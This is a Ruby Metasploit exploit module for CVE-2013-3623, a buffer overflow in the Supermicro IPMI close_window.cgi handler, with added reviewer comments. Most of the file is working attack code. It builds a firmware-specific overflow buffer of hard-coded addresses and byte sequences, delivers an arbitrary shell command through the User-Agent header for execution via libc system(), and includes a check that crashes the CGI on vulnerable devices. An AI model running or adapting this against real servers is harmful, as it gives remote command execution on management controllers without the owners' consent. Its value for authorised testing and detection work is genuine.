require 'msf/core'
# Exploit module for CVE-2013-3623: a strcpy-based overflow in the
# close_window.cgi handler of the Supermicro onboard IPMI web interface.
# The command payload is carried in the User-Agent header and executed
# through libc system() on the device (see 'Description').
# NOTE(review): the class name follows the legacy Metasploit3 convention;
# newer framework versions expect MetasploitModule — confirm against the
# framework version this is loaded into.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient

  # Module metadata: name, description, authors, payload constraints,
  # references and the target table. Each target entry carries a
  # :callback symbol naming the method that builds its overflow buffer;
  # #exploit dispatches on it.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super (update_info(info,
      'Name' => 'Supermicro Onboard IPMI close_window.cgi Buffer Overflow' ,
      'Description' => %q{
        This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web
        interface. The vulnerability exists on the close_window.cgi CGI application, and is due
        to the insecure usage of strcpy. In order to get a session, the module will execute
        system() from libc with an arbitrary CMD payload sent on the User-Agent header. This
        module has been tested successfully on Supermicro Onboard IPMI ( X9SCL / X9SCM ) with firmware
        SMT_X9_214 .
      },
      'Author' =>
        [
          'hdm' ,
          'juan vazquez'
        ],
      'License' => MSF_LICENSE ,
      'Payload' =>
        {
          # The command payload rides in an HTTP header, so up to 8000 bytes
          # are allowed and every control byte 0x00..0x1f is excluded.
          'Space' => 8000 ,
          'DisableNops' => true ,
          'BadChars' => (0x00..0x1f).to_a.pack( "C*" ),
          'Compat' =>
            {
              'PayloadType' => 'cmd' ,
              'RequiredCmd' => 'generic openssl'
            }
        },
      'Platform' => [ 'unix' ],
      'Arch' => ARCH_CMD ,
      'References' =>
        [
          [ 'CVE' , '2013-3623' ],
        ],
      'Targets' =>
        [
          [ 'Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214' ,
            {
              # Resolved with send() in #exploit; the symbol comes from this
              # table, not from any remote or user-supplied input.
              :callback => :target_smt_x9_214
            }
          ]
        ],
      'DisclosureDate' => 'Nov 06 2013' ,
      'DefaultTarget' => 0 ))
  end

  # Issues the POST to /cgi/close_window.cgi that both #check and #exploit
  # rely on. The sess_sid form field carries +sess+ unencoded
  # ('encode_params' => false), and the User-Agent is 16 random letters
  # followed by +agent+. This request shape — an oversized sess_sid value
  # together with an unusual User-Agent on close_window.cgi — is the
  # observable artefact a defender can alert on.
  #
  # @param sess [String] value sent as the sess_sid POST parameter
  # @param agent [String] suffix appended to the User-Agent header
  # @return the HttpClient response, or nil when no response was received
  #   (callers test for nil, see #check)
  def send_close_window_request(sess, agent = rand_text_alpha( 8 ))
    res = send_request_cgi({
      'method' => 'POST' ,
      'uri' => "/cgi/close_window.cgi" ,
      'agent' => rand_text_alpha( 16 ) + agent,
      'encode_params' => false ,
      'vars_post' => {
        'sess_sid' => sess
      }
    })
    return res
  end

  # Vulnerability check, in two probes:
  #   1. a 20-byte sess_sid must produce HTTP 200 with "Can't find action"
  #      in the body, which confirms the endpoint is the expected CGI
  #      (anything else -> Unknown);
  #   2. a 132-byte sess_sid must produce HTTP 500, presumably because the
  #      overflowed CGI crashes; a non-500 answer is reported as Safe.
  # Note that probe 2 is not side-effect free on a vulnerable device — it
  # crashes the CGI process.
  #
  # @return [Exploit::CheckCode] Unknown, Safe or Vulnerable
  def check
    safe_check = rand_text_alpha( 20 )
    trigger_check = rand_text_alpha( 132 )
    res = send_close_window_request(safe_check)
    unless res and res.code == 200 and res.body.to_s =~ /Can't find action/
      return Exploit::CheckCode::Unknown
    end
    res = send_close_window_request(trigger_check)
    unless res and res.code == 500
      return Exploit::CheckCode::Safe
    end
    return Exploit::CheckCode::Vulnerable
  end

  # Builds the sess_sid value for the SMT_X9_214 target. The layout is
  # firmware-specific: it is anchored on two hard-coded base addresses
  # (base_crypt, base_libc) and fixed byte sequences, with random alpha
  # filler in between and padding up to 128 bytes before the final words.
  # The only variable element is +offset+, which depends on whether the
  # connection uses SSL. Because the bytes and their order are what make
  # this work on exactly that firmware, treat the body as opaque data — do
  # not reorder or "clean up" the appends.
  #
  # @return [String] the overflow buffer to send as sess_sid
  def target_smt_x9_214
    base_crypt = 0x40074000
    base_libc = 0x40554000
    buf = rand_text_alpha( 68 )
    buf << rand_text_alpha( 4 )
    buf << rand_text_alpha( 4 )
    buf << rand_text_alpha( 4 )
    buf << [base_crypt + 0x39598].pack( "V" )
    buf << "\x68\xd0\x84\xe2"
    # SSL vs plain HTTP changes the on-stack distance by 4 bytes.
    offset = ssl ? 208 : 204
    buf << [offset].pack( "C" ) + "\x50\x84\xe2"
    buf << "\x70\x40\xb5\xe8"
    buf << "\x20\x40\x84\xe2"
    buf << "\x40\x80\xbd\xe8"
    buf << rand_text_alpha( 4 )
    buf << [ base_crypt + 0x3A8BC ].pack( "V" )
    buf << rand_text_alpha( 4 )
    buf << [ base_libc + 0x3617c ].pack( "V" )
    # Pad to exactly 128 bytes before the trailing two words.
    buf << rand_text_alpha( 128 -buf.length)
    buf << "\x80\x40\x44\xe2"
    buf << "\x54\xf0\x84\xe2"
    return buf
  end

  # Builds the target-specific buffer via the :callback symbol from the
  # target table and sends it as sess_sid, with the encoded command
  # payload appended to the User-Agent header.
  def exploit
    buffer = self .send(target[ :callback ])
    print_status( "#{peer} - Sending exploit..." )
    send_close_window_request(buffer, payload.encoded)
  end
end